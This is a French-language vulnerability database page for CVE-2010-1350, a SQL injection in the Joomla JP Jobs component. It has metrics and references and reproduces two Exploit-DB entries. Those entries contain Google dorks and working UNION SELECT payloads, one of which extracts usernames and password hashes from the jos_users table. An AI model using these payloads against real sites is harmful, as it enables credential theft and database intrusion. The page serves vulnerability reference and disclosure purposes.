CVE-2010-1350 : Détail

CVE-2010-1350

SQL Injection
A03-Injection
0.18%V3
Network
2010-04-12
16h00 +00:00
2017-08-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in the JP Jobs (com_jp_jobs) component 1.4.1 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a detail action to index.php.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 12191

Date de publication : 2010-04-12 22h00 +00:00
Auteur : v3n0m
EDB Vérifié : Yes

) ) ) ( ( ( ( ( ) ) ( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /( )\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\()) ((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\ __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ / \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' < |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\ .WEB.ID ----------------------------------------------------------------------- Joomla Component com_jp_jobs 1.2.0 (id) SQL Injection Vulnerability ----------------------------------------------------------------------- Author : v3n0m Site : http://yogyacarderlink.web.id/ Date : April, 13-2010 Location : Jakarta, Indonesia Time Zone : GMT +7:00 ---------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : JP Jobs Vendor : http://www.joomlanetprojects.com/ License : Non-Commercial Version : 1.2.0 Lower versions may also be affected Google Dork : inurl:com_jp_jobs JP Jobs es un componente sencillo para mostrar ofertas laborales en nuestro Joomla!, dispone de un gestor de ofertas que pueden publicarse o despublicarse en el backend y ser mostradas en formato tabla en la parte publica de una forma general y con una vista de detalle o por categorias. ---------------------------------------------------------------- Exploitz: ~~~~~~~ -999999/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users-- SQli p0c: ~~~~~~~ Check the component version on target first http://sitetarget/[path]/administrator/components/com_jp_jobs/jp_jobs.xml if the component <version>1.2.0</version> it could be vulnerable http://127.0.0.1/[path]/index.php?option=com_jp_jobs&view=detail&id=[SQLi] http://127.0.0.1/[path]/index.php?option=com_jp_jobs&view=detail&id=-999999/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users-- ---------------------------------------------------------------- Shoutz: ~~~~ - 'Happy 6 th Anniversary for YOGYACARDERLINK, keep BlackHat!' - LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi- - setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag - kiddies,whitehat,c4ur [thx for the martabak],mywisdom,yadoy666 - elicha cristia [kamu...!! hahaha absurd girl,i like it and i...] - N.O.C & Technical Support @office - #yogyacarderlink @irc.dal.net ---------------------------------------------------------------- Contact: ~~~~ v3n0m | YOGYACARDERLINK CREW | v3n0m666[0x40]live[0x2E]com Homepage: http://yogyacarderlink.web.id/ http://v3n0m.blogdetik.com/ http://elich4.blogspot.com/ << Update donk >_< ---------------------------[EOF]--------------------------------
Exploit Database EDB-ID : 12037

Date de publication : 2010-04-02 22h00 +00:00
Auteur : Valentin
EDB Vérifié : Yes

:: General information :: Joomla component jp_jobs SQL Injection vulnerability :: by Valentin Hoebel :: valentin@xenuser.org :: Product information :: Name = jp_jobs :: Vendor = Joomla! Projects :: Vendor Website = http://www.joomlanetprojects.com/ :: About the product = http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11163 :: Affected versions = All, latest one is 1.4.1 :: Google dork: "inurl:index.php?option=com_jp_jobs" :: SQL Injection vulnerability The component is extremly useful when it comes down to implementing some sort of job portal into your Joomla website. Injecting SQL commands while viewing details about a job is possible. Vulnerable URL http://some-cool-domain.tld/index.php?option=com_jp_jobs&view=detail&id=1 Test URL http://some-cool-domain.tld/index.php?option=com_jp_jobs&view=detail&id=' Exploit vulnerability, e.g. by displaying the MySQL user: index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+concat(user())--

Products Mentioned

Configuraton 0

Joomlaprojects>>Com_jp_jobs >> Version To (including) 1.4.1

    Joomlaprojects>>Com_jp_jobs >> Version 1.3.0

      Joomlaprojects>>Com_jp_jobs >> Version 1.3.1

        Joomla>>Joomla\! >> Version *

        Références

        http://www.securityfocus.com/bid/39191
        Tags : vdb-entry, x_refsource_BID
        http://www.exploit-db.com/exploits/12037
        Tags : exploit, x_refsource_EXPLOIT-DB
        http://secunia.com/advisories/39325
        Tags : third-party-advisory, x_refsource_SECUNIA